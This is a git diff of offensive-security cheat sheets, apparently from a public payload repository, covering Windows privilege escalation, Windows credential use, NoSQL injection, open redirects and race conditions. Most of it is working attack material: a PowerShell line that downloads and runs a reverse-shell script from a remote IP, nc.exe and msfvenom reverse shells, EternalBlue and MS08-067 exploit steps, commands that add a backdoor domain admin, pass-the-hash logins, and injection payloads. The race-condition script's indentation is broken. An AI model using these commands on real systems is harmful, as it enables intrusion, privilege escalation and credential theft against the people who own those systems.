-### Token Impersonation (RottenPotato)
+## EoP - Living Off The Land Binaries and Scripts
+
+Living Off The Land Binaries and Scripts (and also Libraries) : https://lolbas-project.github.io/
+
+> The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.
+
+A LOLBin/Lib/Script must:
+
+* Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft.
+Have extra "unexpected" functionality. It is not interesting to document intended use cases.
+Exceptions are application whitelisting bypasses
+* Have functionality that would be useful to an APT or red team
+
+```powershell
+wmic.exe process call create calc
+regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
+Microsoft.Workflow.Compiler.exe tests.xml results.xml
+```
+
+## EoP - Impersonation Privileges
+
+Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files.
+
+| Privilege | Impact | Tool | Execution path | Remarks |
+| --- | --- | --- | --- | --- |
+|`SeAssignPrimaryToken`| ***Admin*** | 3rd party tool | *"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"* | Thank you [Aurélien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon. |
+|`SeBackup`| **Threat** | ***Built-in commands*** | Read sensitve files with `robocopy /b` |- May be more interesting if you can read %WINDIR%\MEMORY.DMP<br> <br>- `SeBackupPrivilege` (and robocopy) is not helpful when it comes to open files.<br> <br>- Robocopy requires both SeBackup and SeRestore to work with /b parameter. |
+|`SeCreateToken`| ***Admin*** | 3rd party tool | Create arbitrary token including local admin rights with `NtCreateToken`. ||
+|`SeDebug`| ***Admin*** | **PowerShell** | Duplicate the `lsass.exe` token.  | Script to be found at [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1) |
+|`SeLoadDriver`| ***Admin*** | 3rd party tool | 1. Load buggy kernel driver such as `szkg64.sys`<br>2. Exploit the driver vulnerability<br> <br> Alternatively, the privilege may be used to unload security-related drivers with `ftlMC` builtin command. i.e.: `fltMC sysmondrv` | 1. The `szkg64` vulnerability is listed as [CVE-2018-15732](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732)<br>2. The `szkg64` [exploit code](https://www.greyhathacker.net/?p=1025) was created by [Parvez Anwar](https://twitter.com/parvezghh)  |
+|`SeRestore`| ***Admin*** | **PowerShell** | 1. Launch PowerShell/ISE with the SeRestore privilege present.<br>2. Enable the privilege with [Enable-SeRestorePrivilege](https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1)).<br>3. Rename utilman.exe to utilman.old<br>4. Rename cmd.exe to utilman.exe<br>5. Lock the console and press Win+U| Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
+|`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`<br>2. `icalcs.exe "%windir%\system32" /grant "%username%":F`<br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U| Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
+|`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.<br> <br>To be verified. ||
+
+
+### Meterpreter getsystem and alternatives
+
+```powershell
+meterpreter> getsystem 
+Tokenvator.exe getsystem cmd.exe 
+incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe 
+psexec -s -i cmd.exe 
+python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc
+```
+
+### RottenPotato (Token Impersonation)
 
 Binary available at : https://github.com/foxglovesec/RottenPotato
 Binary available at : https://github.com/breenmachine/RottenPotatoNG
@@ -616,9 +790,111 @@ Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
 Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
 ```
 
+
+### Juicy Potato (abusing the golden privileges)
+
+Binary available at : https://github.com/ohpe/juicy-potato/releases    
+:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809. 
+
+1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication)
+
+    ```powershell
+    whoami /priv
+    ```
+
+2. Select a CLSID based on your Windows version, a CLSID is a globally unique identifier that identifies a COM class object
+
+    * [Windows 7 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_7_Enterprise) 
+    * [Windows 8.1 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_8.1_Enterprise)
+    * [Windows 10 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise)
+    * [Windows 10 Professional](https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro)
+    * [Windows Server 2008 R2 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2008_R2_Enterprise) 
+    * [Windows Server 2012 Datacenter](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter)
+    * [Windows Server 2016 Standard](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2016_Standard) 
+
+3. Execute JuicyPotato to run a privileged command.
+
+    ```powershell
+    JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}
+    JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
+    JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"
+        Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337
+        ......
+        [+] authresult 0
+        {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM
+        [+] CreateProcessWithTokenW OK
+    ```
+
+## EoP - Common Vulnerabilities and Exposure
+
+### MS08-067 (NetAPI)
+
+Check the vulnerability with the following nmap script.
+
+```c
+nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 <ip_netblock>
+```
+
+Metasploit modules to exploit `MS08-067 NetAPI`.
+
+```powershell
+exploit/windows/smb/ms08_067_netapi
+```
+
+If you can't use Metasploit and only want a reverse shell.
+
+```powershell
+https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
+msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
+
+Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
+Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
+Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
+Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
+Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
+Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
+Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
+python ms08-067.py 10.0.0.1 6 445
+```
+
+
+### MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7 
+
+'KiTrap0D' User Mode to Ring Escalation (MS10-015)
+
+```powershell
+https://www.exploit-db.com/exploits/11199
+
+Metasploit : exploit/windows/local/ms10_015_kitrap0d
+```
+
+### MS11-080 (afd.sys) - Microsoft Windows XP/2003
+
+```powershell
+Python: https://www.exploit-db.com/exploits/18176
+Metasploit: exploit/windows/local/ms11_080_afdjoinleaf
+```
+
+### MS15-051 (Client Copy Image) - Microsoft Windows 2003/2008/7/8/2012
+
+```powershell
+printf("[#] usage: ms15-051 command \n");
+printf("[#] eg: ms15-051 \"whoami /all\" \n");
+
+# x32
+https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/Win32/ms15-051.exe
+
+# x64
+https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe
+
+https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051
+use exploit/windows/local/ms15_051_client_copy_image
+```
+
+
 ### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
 
-Check if the patch is installed : `wmic qfe list | find "3139914"`
+Check if the patch is installed : `wmic qfe list | findstr "3139914"`
 
 ```powershell
 Powershell:
@@ -632,13 +908,46 @@ Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
 
 ### MS17-010 (Eternal Blue)
 
+Check the vulnerability with the following nmap script.
+
 ```c
 nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 <ip_netblock>
 ```
 
+Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`.
 
+```powershell
+auxiliary/admin/smb/ms17_010_command          MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
+auxiliary/scanner/smb/smb_ms17_010            MS17-010 SMB RCE Detection
+exploit/windows/smb/ms17_010_eternalblue      MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
+exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
+exploit/windows/smb/ms17_010_psexec           MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
+```
 
+If you can't use Metasploit and only want a reverse shell.
 
+```powershell
+git clone https://github.com/helviojunior/MS17-010
+
+# generate a simple reverse shell to use
+msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe
+python2 send_and_execute.py 10.0.0.1 revshell.exe
+```
+
+### CVE-2019-1388
+
+Exploit : https://packetstormsecurity.com/files/14437/hhupd.exe.html
+
+Working on :
+- Windows 7 
+- Windows 10 LTSC 10240
+
+Failing on : 
+- LTSC 2019
+- 1709
+- 1803
+
+Detailed information about the vulnerability : https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
 
 ## References
 
@@ -667,4 +976,7 @@ nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 <ip_n
 * [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/)
 * [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/)
 * [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/)
-* [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/)
\ No newline at end of file
+* [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/)
+* [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS)
+* [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html)
+* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md
index 1d32e8ce..cd27039e 100644
--- a/Methodology and Resources/Windows - Using credentials.md	
+++ b/Methodology and Resources/Windows - Using credentials.md	
@@ -1,11 +1,32 @@
 # Windows - Using credentials
 
-## TIP 1 - Create your credential :D
+## Summary
+
+* [TIPS](#tips)
+    * [TIP 1 - Create your credential](#tip-1-create-your-credential)
+    * [TIP 2 - Retail Credential](#tip-2-retail-credential)
+    * [TIP 3 - Sandbox Credential - WDAGUtilityAccount](#tip-3-sandbox-credrential-wdagutilityaccount)
+* [Metasploit](#metasploit)
+    * [Metasploit - SMB](#metasploit-smb)
+    * [Metasploit - Psexec](#metasploit-psexec)
+* [Crackmapexec](#crackmapexec)
+* [Winexe](#winexe)
+* [WMI](#wmi)
+* [Psexec.py / Smbexec.py / Wmiexec.py](#psexec.py---smbexec.py---wmiexec.py)
+* [PsExec - Sysinternal](#psexec-sysinternal)
+* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
+* [Netuse](#netuse)
+* [Runas](#runas)
+
+## TIPS
+
+### TIP 1 - Create your credential
 
 ```powershell
 net user hacker hacker1234* /add
 net localgroup administrators hacker /add
-net localgroup "Remote Desktop Users" hacker /add
+net localgroup "Remote Desktop Users" hacker /add # RDP access
+net localgroup "Backup Operators" hacker /add # Full access to files
 net group "Domain Admins" hacker /add /domain
 ```
 
@@ -16,7 +37,9 @@ net user /dom
 net user /domain
 ```
 
-## TIP 2 - Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289)
+### TIP 2 - Retail Credential 
+
+Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289)
 
 when you run Windows in retail demo mode, it creates a user named Darrin DeYoung and an admin RetailAdmin
 
@@ -25,7 +48,9 @@ Username: RetailAdmin
 Password: trs10
 ```
 
-## TIP - Sandbox Credential - WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608)
+### TIP 3 - Sandbox Credential - WDAGUtilityAccount
+
+WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608)
 
 Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard
 
@@ -36,66 +61,94 @@ Password: pw123
 ```
 
 
-## Metasploit - SMB
+## Metasploit
+
+### Metasploit - SMB
 
 ```c
 use auxiliary/scanner/smb/smb_login  
-set SMBDomain CSCOU  
-set SMBUser jarrieta
-set SMBPass nastyCutt3r
+set SMBDomain DOMAIN  
+set SMBUser username
+set SMBPass password
 services -p 445 -R  
 run
 creds
 ```
 
-## Metasploit - Psexec
+### Metasploit - Psexec
 
 Note: the password can be replaced by a hash to execute a `pass the hash` attack.
 
 ```c
 use exploit/windows/smb/psexec
 set RHOST 10.2.0.3
-set SMBUser jarrieta
-set SMBPass nastyCutt3r
+set SMBUser username
+set SMBPass password
 set PAYLOAD windows/meterpreter/bind_tcp
 run
 shell
 ```
 
-## Crackmapexec (Integrated to Kali)
+## Crackmapexec
 
 ```python
 git clone https://github.com/byt3bl33d3r/CrackMapExec.github
-python crackmapexec.py 10.9.122.0/25 -d CSCOU -u jarrieta -p nastyCutt3r
-python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami
-```
-
-## Crackmapexec (Pass The Hash)
-
-```powershell
+python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password
+python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami
+# pass the hash
 cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth
 ```
 
-## Winexe (Integrated to Kali)
+## Winexe 
+
+Integrated to Kali
 
 ```python
-winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe
+winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe
 ```
 
-## Psexec.py / Smbexec.py / Wmiexec.py (Impacket)
+## WMI
+
+```powershell
+wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\System32\calc.exe”
+```
+
+## Psexec.py / Smbexec.py / Wmiexec.py 
+
+from Impacket
 
 ```python
 git clone https://github.com/CoreSecurity/impacket.git
-python psexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
-python smbexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
-python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
+python psexec.py DOMAIN/username:password@10.10.10.10
+python smbexec.py DOMAIN/username:password@10.10.10.10
+python wmiexec.py DOMAIN/username:password@10.10.10.10
+
+# psexec.exe -s cmd
+# switch admin user to NT Authority/System
 ```
 
-## RDP Remote Desktop Protocol (Impacket)
+## PsExec - Sysinternal
+
+from Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)
 
 ```powershell
-python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
-rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 -g 70 -r disk:share=/home/user/myshare
+PsExec.exe  \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe
+PsExec.exe  \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s  # get System shell
+```
+
+## RDP Remote Desktop Protocol 
+
+Abuse RDP protocol to execute commands remotely with [SharpRDP](https://github.com/0xthirteen/SharpRDP)
+
+```powershell
+SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
+```
+
+Or connect remotely with `rdesktop`
+
+```powershell
+rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare
+rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10
 # -g : the screen will take up 70% of your actual screen size
 # -r disk:share : sharing a local folder during a remote desktop session 
 ```
@@ -126,32 +179,28 @@ or with Metasploit
 run getgui -u admin -p 1234
 ```
 
-Then log in using xfreerdp 
+or with xfreerdp 
 
 ```powershell
 xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
- xfreerd /u:runner /v:10.0.0.1 # password will be asked
+xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
+xfreerd /u:runner /v:10.0.0.1 # password will be asked
 ```
 
+## Netuse 
 
-## Netuse (Windows)
+Windows only
 
 ```powershell
-net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r
+net use \\ordws01.cscou.lab /user:DOMAIN\username password
 C$
 ```
 
-## Runas (Windows - Kerberos auth)
+## Runas 
 
 ```powershell
-runas /netonly /user:CSCOU\jarrieta "cmd.exe"
-```
-
-## PsExec (Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) )
-
-```powershell
-PsExec.exe  \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe
-PsExec.exe  \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s  # get System shell
+runas /netonly /user:DOMAIN\username "cmd.exe"
+runas /noprofil /netonly /user:DOMAIN\username cmd.exe
 ```
 
 ## References
diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md
index 130f735c..7c203b8c 100644
--- a/NoSQL Injection/README.md	
+++ b/NoSQL Injection/README.md	
@@ -1,9 +1,29 @@
 # NoSQL injection
 
-NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
+> NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
+
+## Summary
+
+* [Tools](#tools)
+* [Exploit](#exploits)
+  * [Authentication Bypass](#authentication-bypass)
+  * [Extract length information](#extract-length-information)
+  * [Extract data information](#extract-data-information)
+* [Blind NoSQL](#blind-nosql)
+  * [POST with JSON body](#post-with-json-body)
+  * [GET](#get)
+* [MongoDB Payloads](#mongodb-payloads)
+* [References](#references)
+
+## Tools
+
+* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
+* [nosqlilab - A lab for playing with NoSQL Injection](https://github.com/digininja/nosqlilab)
 
 ## Exploit
 
+### Authentication Bypass
+
 Basic authentication bypass using not equal ($ne) or greater ($gt)
 
 ```json
@@ -17,14 +37,14 @@ in JSON
 {"username": {"$gt":""}, "password": {"$gt":""}}
 ```
 
-Extract length information
+### Extract length information
 
 ```json
 username[$ne]=toto&password[$regex]=.{1}
 username[$ne]=toto&password[$regex]=.{3}
 ```
 
-Extract data information
+### Extract data information
 
 ```json
 in URL
@@ -69,8 +89,8 @@ while True:
     for c in string.printable:
         if c not in ['*','+','.','?','|']:
             payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
-            r = requests.post(u, data = payload, headers = headers, verify = False)
-            if 'OK' in r.text:
+            r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
+            if 'OK' in r.text or r.status_code == 302:
                 print("Found one more char : %s" % (password+c))
                 password += c
 ```
@@ -124,5 +144,5 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
 
 * [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
 * [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)
-* [cr0hn - NoSQL injection wordlists](https://github.com/cr0hn/nosqlinjection_wordlists)
-* [Zanon - NoSQL Injection in MongoDB](https://zanon.io/posts/nosql-injection-in-mongodb)
+* [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists)
+* [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb)
diff --git a/Open Redirect/Intruder/Open-Redirect-payloads.txt b/Open Redirect/Intruder/Open-Redirect-payloads.txt
index 6b456f1a..4444e335 100644
--- a/Open Redirect/Intruder/Open-Redirect-payloads.txt	
+++ b/Open Redirect/Intruder/Open-Redirect-payloads.txt	
@@ -233,3 +233,8 @@ ja\nva\tscript\r:alert(1)
 \152\141\166\141\163\143\162\151\160\164\072alert(1)
 http://google.com:80#@www.whitelisteddomain.tld/
 http://google.com:80?@www.whitelisteddomain.tld/
+http://google.com\www.whitelisteddomain.tld
+http://google.com&www.whitelisteddomain.tld
+http:///////////google.com
+\\google.com
+http://www.whitelisteddomain.tld.google.com
diff --git a/Open Redirect/README.md b/Open Redirect/README.md
index 0584673e..57365b08 100644
--- a/Open Redirect/README.md	
+++ b/Open Redirect/README.md	
@@ -114,6 +114,12 @@ http://www.yoursite.com/http://www.theirsite.com/
 http://www.yoursite.com/folder/www.folder.com
 ```
 
+Host/Split Unicode Normalization
+```powershell
+https://evil.c℀.example.com . ---> https://evil.ca/c.example.com
+http://a.com／X.b.com
+```
+
 XSS from Open URL - If it's in a JS variable
 
 ```powershell
@@ -169,4 +175,6 @@ http://www.example.com/redirect.php?url=javascript:prompt(1)
 * [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
 * [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
 * [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
-* [Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7](https://s0cket7.com/open-redirect-vulnerability/)
\ No newline at end of file
+* [Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7](https://s0cket7.com/open-redirect-vulnerability/)
+* [Host/Split
+Exploitable Antipatterns in Unicode Normalization - BlackHat US 2019](https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf)
diff --git a/README.md b/README.md
index 4a990dc8..478a9a5e 100644
--- a/README.md
+++ b/README.md
@@ -4,9 +4,7 @@ A list of useful payloads and bypasses for Web Application Security.
 Feel free to improve with your payloads and techniques !
 I :heart: pull requests :)
 
-You can also contribute with a beer IRL or with `buymeacoffee.com`
-
-[![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
+You can also contribute with a :beers: IRL
 
 Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter:
 
@@ -19,10 +17,13 @@ You might also like the `Methodology and Resources` folder :
 
 - [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/)
   - [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md)
+  - [Cloud - AWS Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md)
+  - [Cloud - Azure Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md)
+  - [Cobalt Strike - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet.md)
   - [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md)
   - [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)
   - [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md)  
-  - [Methodology_and_enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology_and_enumeration.md)
+  - [Methodology and enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology%20and%20enumeration.md)
   - [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md)
   - [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md)
   - [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
@@ -33,23 +34,7 @@ You might also like the `Methodology and Resources` folder :
   - [Windows - Post Exploitation Koadic.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Post%20Exploitation%20Koadic.md)
   - [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
   - [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md)
-
 - [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
-    - Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
-    - Apache Struts 2 CVE-2017-5638.py
-    - Apache Struts 2 CVE-2017-9805.py
-    - Apache Struts 2 CVE-2018-11776.py
-    - Docker API RCE.py
-    - Drupalgeddon2 CVE-2018-7600.rb
-    - Heartbleed CVE-2014-0160.py
-    - JBoss CVE-2015-7501.py
-    - Jenkins CVE-2015-8103.py
-    - Jenkins CVE-2016-0792.py
-    - Shellshock CVE-2014-6271.py
-    - Tomcat CVE-2017-12617.py
-    - WebLogic CVE-2016-3510.py
-    - WebLogic CVE-2017-10271.py
-    - WebLogic CVE-2018-2894.py
-    - WebSphere CVE-2015-7450.py
+
 
 You want more ? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/BOOKS.md) and [Youtube videos](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/YOUTUBE.md) selections.
diff --git a/Race Condition/README.md b/Race Condition/README.md
new file mode 100644
index 00000000..2e70df87
--- /dev/null
+++ b/Race Condition/README.md	
@@ -0,0 +1,49 @@
+# Race Condition
+
+> Race conditions may occur when a process is critically or unexpectedly dependent on the sequence or timings of other events. In a web application environment, where multiple requests can be processed at a given time, developers may leave concurrency to be handled by the framework, server, or programming language. 
+
+## Summary
+
+* [Tools](#tools)
+* [Turbo Intruder Examples](#turbo-intruder-examples)
+* [References](#references)
+
+## Tools
+
+* [Turbo Intruder - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.](https://github.com/PortSwigger/turbo-intruder)
+
+## Turbo Intruder Examples
+
+1. Send request to turbo intruder
+2. Use this python code as a payload of the turbo intruder
+    ```python
+    def queueRequests(target, wordlists):
+        engine = RequestEngine(endpoint=target.endpoint,
+                            concurrentConnections=30,
+                            requestsPerConnection=30,
+                            pipeline=False
+                            )
+
+    for i in range(30):
+        engine.queue(target.req, i)
+            engine.queue(target.req, target.baseInput, gate='race1')
+
+
+        engine.start(timeout=5)
+    engine.openGate('race1')
+
+        engine.complete(timeout=60)
+
+
+    def handleResponse(req, interesting):
+        table.add(req)
+    ```
+3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder
+4. Click "Attack"
+
+
+## References
+
